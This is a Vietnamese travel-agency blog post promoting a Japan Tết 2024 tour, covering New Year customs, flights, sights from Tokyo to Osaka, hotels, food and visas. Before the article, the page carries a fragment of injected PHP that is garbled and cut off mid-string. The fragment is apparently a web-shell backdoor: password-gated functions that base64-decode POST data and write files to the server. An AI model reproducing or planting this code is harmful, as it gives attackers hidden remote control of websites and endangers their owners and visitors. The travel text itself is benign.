function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tour du lịch Nhật Bản Tết 2024: Tokyo-Yamanashi-Kyoto-Osaka

Tour du lịch Nhật Bản Tết 2024: Tokyo-Yamanashi-Kyoto-Osaka

30/03/2023 LamThanhHien

Tour du lịch Nhật Bản Tết 2024 cực kỳ đáng trải nghiệm với cảnh quan tuyệt đẹp và nền văn hóa phong phú và cực kỳ đa dạng của “xứ sở Phù Tang” – Nhật Bản. Tết đến xuân về cũng là dịp loài hoa anh đào đặc trưng của đất nước này đua nhau khoe sắc quanh tháp Tokyo lung linh, đẹp như một bức họa. Tour du lịch Nhật Bản Tết 2024 được rất nhiều tín đồ yêu thích du lịch tự túc lựa chọn, nhưng bạn đã nắm được kinh nghiệm chinh phục Nhật Bản chưa? Nếu chưa thì bài viết dưới đây của Dideden sẽ giúp bạn.

ĐI TOUR DU LỊCH NHẬT BẢN TẾT 2024 CÓ GÌ HẤP DẪN?

Vào từng thời điểm trong năm thì Nhật Bản lại mang một màu sắc, một vẻ đẹp khác nhau mà không trùng lặp. Mọi giác quan của bạn như được làm việc liên tục trước cảnh đẹp trong tour du lịch Nhật Bản Tết 2024.

Tour du lịch Nhật Bản Tết 2024 - Tết Nhật Bản có gì đặc biệt

Đến với tour du lịch Nhật Bản Tết 2024 du khách sẽ được dịp chứng kiến Nhật Bản khoác lên mình chiếc màu mới dịu dàng, đằm thắm

Mặc dù cùng là quốc gia thuộc khu vực châu Á giống với Việt Nam, nhưng Nhật Bản lại đón Tết vào ngày 1/1 dương lịch. Vào những dịp cuối năm, từ khoảng dịp lễ Giáng sinh đến Tết dương lịch, trên khắp các con phố tại Nhật Bản như khoác lên mình một bộ áo mới, không khí khẩn trương, nhộn nhịp vô cùng. Do đó, du khách đi tour du lịch Nhật Bản Tết 2024 có thể sắp xếp thời gian đi vào thời điểm này để có thể tận hưởng thời khắc đặc biệt này tại “xứ sở mặt trời mọc” nhé!

Hòa theo sự kiện đó thì văn hóa đón mừng năm mới của Nhật Bản cũng độc đáo không kém. Vào đêm giao thừa, thời khắc chuyển giao của năm cũ và năm mới, gia đình sẽ ngồi xúm xít bên nhau, cùng thưởng thức món mì kiều mạch (soba toshikoshi), món ăn này có ý nghĩa như một lời chúc sức khỏe, trường thọ và gặp nhiều điều may mắn trong năm mới. Bên cạnh trong dịp này, người ta cũng ăn nhiều món ăn truyền thống như: Rượu gạo ngọt (otoso), súp mochi (ozoni) và osechi ryori.

Trong tour du lịch Nhật Bản Tết 2024 du khách sẽ có cơ hội được trải nghiệm một số lễ hội đặc biệt như:

  • Kohaku Uta Gassen: Lễ hội chào đón năm mới;
  • Hatsumode: Tổ chức tại các đền chùa vào ngày 1/1;
  • Lễ chúc mừng của Hoàng đế vào ngày 2/1 hằng năm.

>>>Xem thêm: Du lịch Nhật Bản giá rẻ – Ghé thăm 5+ địa điểm nổi tiếng

CÁCH DI CHUYỂN ĐẾN NHẬT BẢN TỪ VIỆT NAM

Hầu hết du khách đi tour du lịch Nhật Bản Tết 2024 sẽ chọn máy bay làm phương tiện di chuyển vì nó nhanh chóng và tiện lợi để di chuyển từ Việt Nam sang Nhật Bản. Nếu bạn có kế hoạch đi tour du lịch Nhật Bản Tết 2024 thì bạn cần phải chuẩn bị những giấy tờ cần thiết như: Visa, vé máy bay, chọn hãng hàng không và bảo hiểm du lịch.

Hiện nay, có rất nhiều hãng hàng không khai thác chuyến bay thẳng từ Việt Nam đến Nhật Bản hàng ngày. Chọn hãng hàng không nào còn tùy thuộc vào điều kiện kinh tế và nhu cầu của bạn.

Tour du lịch Nhật Bản Tết 2024 - Cách di chuyển đến Nhật Bản

Hãng hàng không quốc gia Nhật Bản, Japan Airlines

Nếu du khách tour du lịch Nhật bản Tết 2024 yêu thích các dịch vụ cao cấp thì có thể chọn các hãng hàng không như: Vietnam Airlines, ANA, Japan Airlines,… Có đường bay thẳng phục vụ hàng ngày. Hoặc một số hãng hàng không giá rẻ như: Vietjet, Bamboo Airways cũng có khai thác các chuyến đến Nhật Bản.

CÁC ĐIỂM ĐẾN LÝ TƯỞNG TRONG TOUR DU LỊCH NHẬT BẢN TẾT 2024

Ngoài việc được đắm chìm vào không khí đón mừng năm mới tại đất nước xinh đẹp này thì Nhật Bản cũng sở hữu cực kỳ nhiều điểm đến lý tưởng dành cho du khách trong tour du lịch Nhật Bản Tết 2024. Một trong số đó là:

1. Hoàng Cung Tokyo

Điểm đến đầu tiên trong tour du lịch Nhật Bản Tết 2024Dideden muốn giới thiệu với du khách là Hoàng cung Tokyo. Hoàng cung được xây dựng theo lối kiến trúc cũ của lâu đài Edo. Hoàng cung Nhật Bản đã từng bị phá hủy trong thế chiến thứ II, sau đó công trình đã được xây dựng lại nguy nga như ban đầu. Ngày trước, dinh thự là nơi cư trú của các tướng quân, sau đó trở thành nơi ở của Nhật Hoàng.

Tour du lịch Nhật Bản Tết 2024 - Hoàng Cung Tokyo

Hoàng Cung Tokyo nguy nga lộng lẫy, đặc trưng với lối kiến trúc từ thời Edo

Tour du lịch Nhật Bản Tết 2024 là một cơ hội rất tuyệt vời để du khách có thể tham quan được Hoàng cung nguy nga, tráng lệ bật nhất này. Bởi vì các tòa nhà và vườn tược bên trong đều không mở cửa chào đón du khách, mà nó chỉ mở cửa vào ngày 23/12 và ngày 2/1 mà thôi.

Hoàng cung Tokyo có tổng diện tích (bao gồm các khu vườn) là 7,41 km2, được bao bọc bởi các hào nước và những bức tường đá tọa lạc ngay trung tâm Tokyo. Bên cạnh có, Hoàng cung còn có công viên Kitanomaru và nhà thi đấu Nippon Budokan tọa lạc tại phía Bắc. Đây là nơi dùng để biểu diễn võ thuật, đấu vật và biểu diễn âm nhạc.

>>>Xem thêm: Tour Nhật Bản – Chiêm ngưỡng vẻ đẹp ở đất nước mặt trời mọc

2. Đền Asakusa Kannon

Asakusa Kannon hay còn được gọi là đền Sensoji là ngôi đền cổ nhất tại thủ đô Tokyo. Sensor là một cách gọi khác của Asakusa, còn “ji” tiếng Nhật nó có nghĩa là đền, chùa. Đền được hoàn thành vào năm 645, đây là nơi diễn ra rất nhiều lễ hội lớn. Vào mỗi dịp Tết, vào đêm giao thừa hoặc ngày đầu năm mới, khách du lịch Nhật Bản Tết 2024 và người dân Nhật Bản thường đến đây để cầu nguyện.

Tour du lịch Nhật Bản Tết 2024 - Đền Asakusa Kannon

Asakusa Kannon là ngôi đền cổ nhất tại thủ đô Tokyo, đây là địa điểm linh thiêng du khách tour du lịch Nhật Bản Tết 2024 đến thăm

Đền có 2 cổng chính là công Sẩm và cổng Hozomon, hai cổng này được nối với nhau bằng con đường mua sắm sầm uất Nakamise. Con đường này có từ 1685, có chiều dài 250m. Con đường được lát gạch sạch sẽ, những hàng cột nhà ven đường được sơn một màu đỏ đặc trưng.

Trên con đường này bày bán khoảng 90 gian hàng, bày bán các món quà lưu niệm truyền thống của Nhật Bản. Du khách đi tour du lịch Nhật Bản Tết 2024 có thể mua những món quà lưu niệm này về làm quà cho gia đình, bạn bè, người thân cũng rất ý nghĩa!

Điện Quan Âm – Kannondo là đại điện chính của đền Asakusa Kannon được công nhận là di sản quốc gia. Đền cực kỳ linh thiêng nên hàng năm thu hút rất nhiều du khách tour du lịch Nhật Bản Tết 2024 đến tham quan, chiêm bái.

3. Núi Phú Sĩ

Với độ cao sừng sững hơn 3.776m so với mực nước biển, núi Phú Sĩ hiện là đỉnh núi cao nhất tại “xứ sở hoa anh đào”. Ngày nay, núi Phú Sĩ và những khu vực lân cận trở thành một điểm đến vui chơi phổ biến, xứng đáng góp mặt trong top những địa điểm lý tưởng nên tham quan trong tour du lịch Nhật Bản Tết 2024.

Tour du lịch Nhật Bản Tết 2024 - Núi Phú Sĩ

Núi Phú Sĩ hiện nay được biết đến là đỉnh núi cao nhất tại Nhật Bản

Núi Phú Sĩ được xem là một trong những biểu tượng của đất nước Nhật Bản, khách du lịch từ khắp nơi trên thế giới, trong đó có khách đi tour du lịch Nhật Bản Tết 2024 đổ về hai tỉnh Shizuoka và Yamanashi để có thể tận mặt chiêm ngưỡng vẻ đẹp tráng lệ của ngọn núi này. Trong văn hóa của người Nhật thì núi Phú Sĩ từ lâu đã trở thành một “địa chỉ” tâm linh quan trọng và là nguồn cảm hứng nghệ thuật cho rất nhiều nghệ sĩ tại đây.

Khu vực này cũng được thiên nhiên cực kỳ ưu ái với 5 hồ nước ở phía chân núi và rất nhiều hang động gần cánh rừng Aokigahara, cùng với đó là nhiều suối nước nóng rất giàu khoáng chất, giúp nơi đây trở thành thiên đường nghỉ dưỡng cho du khách tour du lịch Nhật Bản Tết 2024.

>>>Xem thêm: TOUR ĐI KYOTO – Vùng đất cố đô Nhật Bản đẹp không lối thoát

4. Làng Cổ Oshino Hakkai

Có thể chắc chắn một điều rằng làng cổ Oshino Hakkai là một địa điểm du lịch siêu hấp dẫn mà du khách tour du lịch Nhật Bản Tết 2024 nên đến để trải nghiệm.

Tour du lịch Nhật Bản Tết 2024 - Làng Cổ Oshino Hakkai

Làng cổ Oshino Hakkai nên thơ, thanh bình như bước ra từ tranh vẽ

Làng cổ Oshino Hakkai tọa lạc ngay dưới chân của núi Phú Sĩ, ngôi làng sở hữu kiến trúc mang đậm phong cách của Nhật Bản với khung cảnh bình yên đến lạ. Đến đây du khách sẽ được dịp thưởng ngoạn những ao hồ lặng nước, cùng các mảng màu xanh mát mẻ, hòa vào đó là các mái nhà nhỏ xinh được lợp bằng các loại cỏ vô cùng đặc biệt. Nếu đến đây vào mùa xuân thì khách đi tour du lịch Nhật Bản Tết 2024 sẽ được “tận mục sở thị” cảnh đẹp như tranh vẽ là như thế nào.

Trên những hồ nước lớn tại làng cổ Oshino Hakkai có được bố trí các cây cầu gỗ bắc ngang. Cùng với đó là các guồng quay nước bằng gỗ tạo điểm xuyết cho những hồ nước tại đây. Đến với làng cổ Oshino Hakkai ngoài việc du khách tour du lịch Nhật Bản Tết 2024 sẽ được chiêm ngưỡng cảnh sắc thơ mộng, trong lành thì du khách còn được khám phá nhiều phong tục tập quán đã được người dân lưu giữ qua hàng ngàn năm.

5. Chùa Kiyomizu-dera

Nếu có cơ hội tham gia tour du lịch Nhật Bản Tết 2024 thì bạn nên đến với chùa Kiyomizu-dera một lần. Chùa Kiyomizu-dera là một điểm đến tiêu biểu khi nhắc đến vùng đất Kyoto. Ngôi chùa tọa lạc tại trung tâm của vùng núi Otowayama, thuộc khu vực đồi núi Higashiyama. Du khách tour du lịch Nhật Bản Tết 2024 sẽ rất ngạc nhiên và choáng ngợp bởi độ nguy nga và thiêng liêng tại chùa chênh vênh giữa lưng chừng núi.

Tour du lịch Nhật Bản Tết 2024 - Chùa Kiyomizu-dera

Chùa Kiyomizu-dera cheo leo giữa lưng chừng núi, đây là một trong những ngôi chùa độc đáo nhất thế giới mà du khách tour du lịch Nhật Bản Tết 2024 không nên bỏ qua

Ngôi chùa đã có tuổi đời lên đến 1.200 năm mang kiến trúc cổ xưa quý hiếm bởi vì chùa đã được xây dựng từ trước khi thành Heian-kyo (tên cũ của Kyoto) được thành lập. Khuôn viên của chùa rộng hơn 13.000 m2, lấy cảnh núi Otokoyama làm nền. Du khách tour du lịch Nhật Bản Tết 2024 có thể được “tận mục sở thị” nhiều đặc trưng của chùa như khu chính điện đứng trụ bằng cột gỗ cheo leo giữa lưng núi, tháp có 3 tầng lớn nhất tại Nhật Bản và gác chuông khổng lồ.

Trong khuôn viên chùa, du khách tour du lịch Nhật Bản Tết 2024 có thể cầu nguyện một trong 3 nguồn nước linh thiêng chảy từ thác Otowa ra. Nguồn nước này có tên là “ogon-sui” hoặc “enmei-sui”. Du khách tour du lịch Nhật Bản Tết 2024 có thể hứng lấy 1 trong 3 dòng nước thiêng này để rửa sạch lục chi của cơ thể (lục chi bao gồm mắt, mũi, tai, thân, miệng và ý niệm) và cầu nguyện với thần Phật những điềm lành, may mắn trong năm mới.

>>>Xem thêm: 6+ Kinh nghiệm đi tour Nhật Bản 6 ngày 5 đêm

6. Lâu Đài Osaka

Lâu đài Osaka là điểm đến du lịch cực nổi tiếng với vẻ đẹp trầm mặc, cổ kính khiến bao du khách tour du lịch Nhật Bản Tết 2024 mê mệt. Lâu đài Osaka được xây dựng bởi lãnh chúa Toyotomi Hideyoshi vào năm 1583. Vào thời điểm đó, lâu là tòa lâu đài lớn nhất được xây dựng trên nền của ngôi đền Ishiyama Honganji đã bị phá hủy trước đó.

Tour du lịch Nhật Bản Tết 2024 - Lâu Đài Osaka

Lâu Đài Osaka nổi tiếng với kiến trúc trầm mặc, cổ kính chắc chắn sẽ khiến du khách tour du lịch Nhật Bản Tết 2024 mê mệt

Đến với lâu đài Osaka du khách có thể tham quan từ tầng 1 đến tầng 7 và lắng nghe về lịch sử của thời Toyotomi Hideyoshi. Tại đây cũng trưng bày khá nhiều các mô hình vũ khí, nón giáp và mô hình của những trận chiến xưa rất bắt mắt. Tại tầng 8 du khách tour du lịch Nhật Bản Tết 2024 có thể chiêm ngưỡng hết toàn bộ vẻ đẹp uy nghiêm của lâu đài Osaka.

Khu vườn truyền thống với 600 cây hoa anh đào của Nishinomaru đã góp phần tạo nên vẻ đẹp kiều diễm cho tòa lâu đài này. Đây cũng là một trong những địa điểm ngắm hoa anh đào tuyệt đẹp tại Nhật Bản mà du khách tour du lịch Nhật Bản Tết 2024 nên lưu ý.

7. Thị Trấn Cổ Ouchi-juku

Nếu bạn là du khách tour du lịch Nhật Bản Tết 2024 yêu thích sự hoài cổ và truyền thống thì thị trấn cổ Ouchijuku là địa điểm dành cho bạn. Ouchijuku là một thị trấn bưu điện cũ đã tồn tại từ thời kì Edo. Trong lịch sử sách ghi lại, thị trấn này từng là nơi nghỉ chân và nơi cung cấp lương thực và chỗ ngủ cho các du khách thập phương gần xa. Hiện nay, Ouchijuku đã trở thành một địa điểm du lịch hấp dẫn đang chờ đợi du khách tour du lịch Nhật Bản Tết 2024 đến khám phá.

Tour du lịch Nhật Bản Tết 2024 - Thị Trấn Cổ Ouchi-juku

Ouchijuku là một thị trấn bưu điện cũ đã tồn tại từ thời kì Edo

Thị trấn đã được khôi phục theo nguyên bản từ thời Edo với những căn nhà tranh bên cạnh con đường lát nhựa, những căn nhà đó dùng để làm nhà hàng, quán trọ hoặc các cửa hàng bán đồ lưu niệm. Bên cạnh đó, nơi đây cũng có một nhà về triển lãm lịch sử hình thành và phát triển của thị trấn, cũng như có các đền và chùa phục vụ nhu cầu tham quan và cầu nguyện của du khách tour du lịch Nhật Bản Tết 2024.

>>>Xem thêm: [Top 30] Điểm đến du lịch Nhật Bản đẹp quên lối về

8. Tắm Onsen Tại Hồ Nước Nóng 

Sẽ thật là một thiếu sót rất lớn nếu du khách đi tour du lịch Nhật Bản Tết 2024 bỏ qua hoạt động tắm Onsen.

Tour du lịch Nhật Bản Tết 2024 - Trải Nghiệm Tắm Onsen

Tắm Onsen sẽ giúp du khách tour du lịch Nhật Bản Tết 2024 cảm thấy thư thái hơn sau một thời gian dài học tập và làm việc mệt mỏi

Người Nhật tắm Onsen để cơ thể của họ cảm thấy thoải mái và thư thái hơn sau những ngày làm việc và học tập mệt mỏi. Dần dà nó đã trở thành một nét văn hóa đặc sắc của người Nhật, vào những ngày lập xuân, thời tiết se lạnh được trầm mình dưới làn nước ấm áp và massage nhẹ nhàng, thư thái thật chẳng còn gì bằng!

9. Tháp Tokyo Skytree

Tháp Tokyo Skytree cao 634 mét, được xem là một công trình đáng tự hào tại “đất nước Phù Tang” với độ cao đáng nể và kiến trúc vô cùng độc đáo. Đây là một địa điểm mà du khách đi tour du lịch Nhật Bản Tết 2024 không nên bỏ lỡ.

Tour du lịch Nhật Bản Tết 2024 - Tháp truyền hình Tokyo Skytree

Tháp truyền hình Tokyo Skytree cũng sẽ trở thành một hình ảnh mang tính biểu tượng của Tokyo trong thời đại chuyển đổi số thế kỷ 21

Ngoài chức năng giúp cho tín hiệu truyền tin trở nên rõ ràng hơn, không bị chiều cao của các tòa nhà cản trở, tòa tháp Tokyo Skytree còn giúp cho việc xem chương trình truyền hình trên các thiết bị di động được tốt hơn. Tháp truyền hình Tokyo Skytree cũng sẽ trở thành một hình ảnh mang tính biểu tượng của Tokyo trong thời đại chuyển đổi số thế kỷ 21, cho thấy được sự hiện đại, bắt kịp thời đại của Nhật Bản.

Nếu du khách tour du lịch Nhật Bản Tết 2024 đã đến với tháp truyền hình Tokyo Skytree rồi thì đừng nên bỏ qua hoạt động đi trên sàn kính. Du khách vừa di chuyển trên cầu kính, vừa chiêm ngưỡng được toàn cảnh thành phố Tokyo dưới chân mình. Quả là một cảm giác sẽ vừa khiến cho bạn vừa cảm thấy lo sợ vừa cảm thấy phấn khích.

>>>Xem thêm: Tour Hàn Quốc, du lịch Nhật Bản nóng trở lại từ cuối năm

10. Đảo Nhân Tạo Odaiba

Tại đất nước Nhật Bản không chỉ nổi tiếng bởi các cảnh sắc thiên nhiên tuyệt đẹp, mà tại đây còn tồn tạo một hòn đảo nhân tạo với tầm cỡ quy mô lớn ngay tại vịnh Tokyo. Đó là hòn đảo Odaiba chắc chắn sẽ làm khách du lịch tour du lịch Nhật Bản Tết 2024 cảm thấy mãn nhãn.

Tour du lịch Nhật Bản Tết 2024 - Đảo Nhân Tạo Odaiba

Không những có những cảnh quan thiên nhiên tuyệt vời, Nhật Bản còn có đảo nhân tạo Odaiba với quy mô tầm cỡ

Hòn đảo này ban đầu được xây dựng lên với mục đích phòng thủ và sau đó phát triển lên thành cảng biển. Tiếp đến nó được mở rộng ra thành các trung tâm thương mại, vui chơi giải trí, khu dân cư hàng đầu tại Nhật Bản.

Đảo nhân tạo Odaiba chắc chắn sẽ không làm cho du khách tour du lịch Nhật Bản Tết 2024 thất vọng mà ngược lại tạo cho bạn cảm giác thích thú và choáng ngợp bởi hệ thống giao thông hiện đại, tàu điện chạy trên không.

TOP CÁC KHÁCH SẠN “ĐỈNH CAO” TẠI NHẬT CHO KHÁCH ĐI TOUR DU LỊCH NHẬT BẢN TẾT 2024 LỰA CHỌN

Park Hotel Tokyo

Park Hotel Tokyo là một khách sạn có kiến trúc chọc trời vô cùng hiện đại nằm trong lòng thủ đô Tokyo nhộn nhịp. Tại tầng cao nhất của khách sạn du khách tour du lịch Nhật Bản Tết 2024 có thể ngắm nhìn toàn bộ thành phố Tokyo.

Tour du lịch Nhật Bản Tết 2024 - Park Hotel Tokyo

Park Hotel Tokyo là một khách sạn có kiến trúc chọn trời vô cùng hiện đại nằm trong lòng thủ đô Tokyo nhộn nhịp

Khách sạn Park Hotel Tokyo cũng nằm tại vị trí “đắc địa”. Chỉ cách ga Shimbashi tầm 2 phút đi bộ mà thôi, rất thuận tiện cho việc di chuyển của bạn, nó cho phép bạn có thể đi đến nhiều địa điểm tham quan trong khu vực bằng phương tiện vô cùng tiện lợi đó chính là tàu điện ngầm.

Khách sạn có 7 lựa chọn ăn uống dành cho khách đi tour du lịch Nhật Bản Tết 2024 phục vụ các món ăn Nhật Bản và nước ngoài. Một số các tiện ích đi kèm của khách sạn là: Spa, phòng tập thể hình và phòng khách được trang trí vô cùng hiện đại và sang trọng.

>>>Xem thêm: Tour Nhật Bản từ Hà Nội – Tour du lịch trọn gói năm 2023

Hoshinoya Karuizawa

Nếu bạn là một người yêu thích “những mảng xanh” và muốn hòa mình với thiên nhiên thì Hoshinoya Karuizawa là khách sạn dành cho bạn!

Tour du lịch Nhật Bản Tết 2024 - Hoshinoya Karuizawa

Hoshinoya Karuizawa như được hòa mình với thiên nhiên với hệ thống cây xanh được trồng xung quanh khách sạn

Chỉ với một chuyến tàu cao tốc từ thành phố Tokyo hoặc Kyoto có thể đưa du khách tour du lịch Nhật Bản Tết 2024 về với tỉnh Nagano, nơi mà khách sạn Hoshinoya Karuizawa tọa lạc.

Khu nghỉ mát này giúp bạn có cơ hội tham gia các hoạt động ngoài trời và đi bộ đến các thác nước hoặc đi tham quan núi lửa, thậm chí nhiều du khách cho rằng chỉ cần ở trong khách sạn thôi cũng khiến cho họ cảm thấy thư giãn.

Hoshinoya Karuizawa là một khu nghỉ mát “đúng điệu” với spa, suối nước nóng và các phòng nằm trên bề mặt nước hoặc được du khách tour du lịch Nhật Bản Tết 2024 sẽ được sưởi ấm bằng năng lượng địa nhiệt cực kỳ đặc biệt. Hệ thống phòng ốc tối đa hóa tầm nhìn ngắm khung cảnh thiên nhiên bên ngoài, tạo ra cảm giác du khách đang hòa hợp với thiên nhiên chứ không phải đang lưu trú trong một khách sạn hiện đại.

Windsor Hotel Toya

Tọa lạc tại đảo Hokkaido của Nhật Bản, du khách tour du lịch Nhật Bản Tết 2024 sẽ nhìn thấy một khu nghỉ dưỡng và spa của khách sạn Windsor Toya. Nơi đây có dạng phòng theo phong cách tối giản truyền thống có chiếu tatami hoặc loại giường theo phong cách hiện đại, cùng với đó là các tiện nghi như wifi, tủ lạnh cá nhân và TV màn hình phẳng.

Tour du lịch Nhật Bản Tết 2024 - Windsor Hotel Toya

Windsor Hotel Toya với hệ thống phòng ốc cô cùng sang trọng, đẳng cấp

Đặc biệt, ở Windsor Toya thì spa mới là tiện nghi được nhiều du khách tour du lịch Nhật Bản Tết 2024 quan tâm nhiều nhất khi có nhà tắm, hồ bơi ngay trong nhà và bồn tắm nước nóng. Hơn thế nữa, tại Windsor Toya có một sân golf tuyệt đẹp trong khách sạn.

>>>Xem thêm: Lịch lá đỏ Nhật Bản 2023: “Check” ngay cho “nóng”

Gate Hotel Asakusa Kaminarimon

Gate Hotel Asakusa Kaminarimon cách ga Asakusa không xa, đây là một trong những khách sạn xinh đẹp và đẳng cấp bậc nhất tại thành phố Tokyo. Do vị trí địa lý thuận lợi giúp du khách tour du lịch Nhật Bản Tết 2024 thuận lợi di chuyển vòng quanh thành phố, hoặc bạn cũng có thể đi bộ đến một số địa điểm tham quan gần đó như là Đền Sensoji hoặc Công viên giải trí Hanayashiki.

Tour du lịch Nhật Bản Tết 2024 - Gate Hotel Asakusa Kaminarimon

Gate Hotel Asakusa Kaminarimon là một trong những khách sạn sang trọng, đẳng cấp bậc nhất thành phố Tokyo

Hệ thống phòng ốc tại khách sạn Gate Hotel Asakusa Kaminarimon đều vô cùng hiện đại và sang trọng. Một số tiện ích mà du khách tour du lịch Nhật Bản Tết 2024 sẽ được trải nghiệm như là: Liệu pháp massage tại phòng, nhà hàng Pháp đẳng cấp và sân thượng ngoài trời dành riêng cho du khách thưởng thức, đây là một nơi vô cùng lý tưởng để ngắm nhìn thành phố về đêm.

9 Hours Capsule Hotel

Nếu bạn là tín đồ yêu thích sự hiện đại và sáng tạo thì du khách tour du lịch Nhật Bản Tết 2024 có thể tham khảo qua 9 Hours Capsule Hotel. Tại đây du khách sẽ có cảm giác mình giống như ngủ qua đêm trên một con tàu du hành vào vũ trụ tương lai bao la, rộng lớn. Chắc chắn đây sẽ là một trải nghiệm thú vị mà du khách tour du lịch Nhật Bản Tết 2024 không thể nào quên.

Tour du lịch Nhật Bản Tết 2024 - 9 Hours Capsule Hotel

9 Hours Capsule Hotel mang phong cách sáng tạo và trẻ trung

9 Hours Capsule Hotel chỉ nằm cách ga tàu lửa Kawaramachi tại trung tâm thành phố Kyoto một quãng đường ngắn rất thuận tiện để tiếp cận. Các phòng ngủ ở đây được thiết kế theo tiêu chí thoải mái và rộng rãi hơn so với tưởng tượng của nhiều du khách. Với tone màu sắc chủ đạo là màu trắng tại cho chúng ta cảm giác thoáng đãng, kèm với đó là các tiện nghi cơ bản, tủ khóa và phòng tắm dành riêng cho nam và nữ.

>>>Xem thêm: [HOT] Mẹo đi Tour Nhật Bản 5 ngày 4 đêm không nên bỏ qua

NHỮNG ĐẶC SẢN MÀ DU KHÁCH TOUR DU LỊCH NHẬT BẢN TẾT 2024 NÊN THỬ

Nhật Bản không chỉ nổi tiếng bởi các cảnh quan tươi đẹp cùng sự đặc biệt của 2 dòng chạy văn hóa hiện đại và truyền thống cùng song song tồn tại. Nhật Bản còn nổi tiếng với những đặc sản “có một không hai”, Dideden mời bạn cùng khám phá nhé!

Sashimi

Khi nhắc đến Nhật Bản thì chắc chắn sẽ có nhiều du khách tour du lịch Nhật Bản Tết 2024 nghĩ ngay đến món Sashimi. Từ lâu, Sashimi đã trở thành tính biểu tượng cho tinh hoa ẩm thực Nhật Bản.

Tour du lịch Nhật Bản Tết 2024 - Sashimi

Sashimi đã trở thành tính biểu tượng cho tinh hoa ẩm thực Nhật Bản

Sashimi được chế biến từ nguyên liệu chính là hải sản tươi sống được chọn lọc kỹ càng, sơ chế cẩn thận để hải sản không bị tanh và đảm bảo cho sức khỏe của thực khách.

Một số nguyên liệu để làm Sashimi thường gặp là: Cá hồi, cá ngừ, mực, tôm, sò,… Được thái từng miếng nhỏ vừa ăn rồi chấm với một ít nước tương truyền thống kèm với wasabi. Chỉ đơn giản vậy thôi mà đem đến cho du khách tour du lịch Nhật Bản Tết 2024 một dịp bùng nổ vị giác sống động.

Sushi

Sushi cũng giống như là Sashimi cũng là một món ăn được rất nhiều du khách tour du lịch tour du lịch Nhật Bản Tết 2024 nhớ đến khi nhắc về đặc sản Nhật Bản.

Tour du lịch Nhật Bản Tết 2024 - Sushi

Sushi cũng giống như là Sashimi cũng là một món ăn được rất nhiều du khách tour du lịch tour du lịch Nhật Bản Tết 2024 ưa chuộng

Sushi có rất nhiều loại như: Nigiri Sushi, Norimaki, Chirashizushi, Oshizushi, Inarizushi,… Tùy từng địa phương mà Sushi được chế biến với nhiều hương vị khác nhau. Nếu du khách tour du lịch Nhật Bản Tết 2024 đến với thành phố Tokyo thì đừng nên bỏ qua món Edomaezushi nhé!

>>>Xem thêm: ĐI DU LỊCH NHẬT BẢN CẦN NHỮNG GÌ – A ĐẾN Z

Thịt Bò Nhật Bản

Nhật Bản được biết đến là một quốc gia cho ra nhiều loại thịt bò thượng hạng và cao cấp như: Bò Kobe, bò Hida, bò Miyazaki, bò Omi, bò Matsusaka,… Đây được xem như là một loại thực phẩm mang tính “xa xỉ”, đắt đỏ do quá trình nuôi dưỡng nghiêm ngặt và khoa học.

Tour du lịch Nhật Bản Tết 2024 - Thịt Bò Nhật Bản

Nhật Bản được xem là một quốc gia cho ra nhiều món bò hảo hạn bậc nhất thế giới

Những loại bò này có tỷ lệ thịt mỡ rất hài hòa, mang tính dinh dưỡng cao. Một trong các quy trình nuôi dưỡng bò cực kỳ thú vị ở Nhật đó là bò sẽ được uống nước tinh khiết và nghe nhạc cổ điển nên rất chất lượng. Giá bán dao động từ 500 USD đến 3000 USD/ kg.

Các Loại Mì

Nếu bạn có theo dõi những bộ phim truyện hoặc phim hoạt hình thì sẽ thấy món mì xuất hiện rất nhiều trong văn hóa của “xứ sở hoa anh đào”. Và mì tại Nhật Bản thì cũng rất nhiều loại: Mì Udon, mì Soba, mì Ramen, mì Somen,…

Tour du lịch Nhật Bản Tết 2024 - Các Loại Mì Nhật Bản

Mì Udon là một loại mì rất nổi tiếng tại Nhật Bản

Mỗi một loại mì đều mang một hương vị đặc trưng riêng. Đặc điểm chung của sợi mì ở Nhật Bản là sợi mì tươi được chế biến từ bột mì trộn với bột kiều mạch. Nước dùng ăn mì có thể là nước dùng nóng hoặc lạnh.

Một số loại nước dùng được ninh từ tảo biển cá ngừ bào, nước tương và rượu mirin nên hương vị càng đặc biệt hơn gấp bội lần. Nếu có dịp tham gia tour du lịch Nhật Bản Tết 2024 bạn nên thử cho mình một bát mì để có thể cảm nhận hết tinh hoa ẩm thực Nhật bản là như thế nào nhé!

>>>Xem thêm: Săn vé rẻ Hà Nội Nhật Bản, ngắm cảnh đẹp mê hồn ở Tokyo

Bánh Mochi

Nếu bạn là tín đồ yêu thích những chiếc bánh ngọt thì đừng nên bỏ qua cơ hội thử những chiếc bánh Mochi núng nính khi đi tour du lịch Nhật Bản Tết 2024 nhé.

Tour du lịch Nhật Bản Tết 2024 - Bánh Mochi

Bánh Mochi là thức bánh đại diện cho các loại đồ ngọt tại Nhật

Bánh Mochi là một loại bánh dày có nhân ngọt, thường hay xuất hiện trong các ngày lễ quan trọng hoặc dịp Tết của người Nhật. Bánh có hình tròn, nhỏ rất xinh xắn và thường sẽ có 3 lớp. Lớp ngoài cùng là vỏ bánh được làm bằng bột gạo nếp dẻo dai và mịn màng. Lớp giữa là nhân bánh, nhân bánh rất đa dạng có thể là làm từ đậu đỏ, đậu xanh, đậu đen hoặc là trà xanh,… Lớp trong cùng là một viên kem lạnh.

Ở từng địa phương khác nhau thì món bánh Mochi cũng có những “phiên bản” khác nhau. Nếu ghé vào một tiệm bán bánh Mochi truyền thống, du khách tour du lịch Nhật Bản Tết 2024 sẽ có cơ hội tận mắt chứng kiến quy trình làm bánh tỉ mẩn của các nghệ nhân và được thưởng thức món bánh xinh xắn này trên chính nơi mà nó được “sinh ra”. Chắc chắn sẽ là một trải nghiệm đáng nhớ đối với du khách tour du lịch Nhật Bản Tết 2024.

NHỮNG VẬT DỤNG CẦN THIẾT TRONG TOUR DU LỊCH NHẬT BẢN TẾT 2024

Visa

Đây chính là thứ quan trọng nhất, nó như một tấm giấy thông hành để bạn có thể thực hiện chuyến tour du lịch Nhật Bản Tết 2024. Hiện tại, Nhật Bản chưa có chính sách miễn visa cho công dân Việt Nam, nên bạn phải xin visa theo đúng quy định. Bạn có thể xin visa thông qua các cơ quan chuyên cung cấp dịch visa.

